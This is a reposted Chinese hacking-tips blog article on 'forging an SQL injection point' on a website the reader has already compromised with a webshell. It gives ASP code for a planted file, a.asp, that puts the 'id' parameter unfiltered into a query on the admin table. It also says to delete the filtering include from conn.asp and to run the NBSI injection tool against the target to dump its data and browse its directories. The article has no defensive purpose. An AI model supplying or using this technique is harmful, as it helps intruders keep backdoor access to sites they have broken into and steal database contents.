如何伪造SQL注入点


文章整理发布:黑客风云
文章来源:www.05112.com 更新时间:2006-8-3 10:30:57 作者:pt007 信息来源:幻影旅团

有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id ’如果没有这个admin表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>

然后输入:http://目标IP/a.asp?id=1
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录.
 

Posted on: 2008, October 19, 3:40 PM | Filed under: 技巧摘录 |
Tags:asp, injection

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »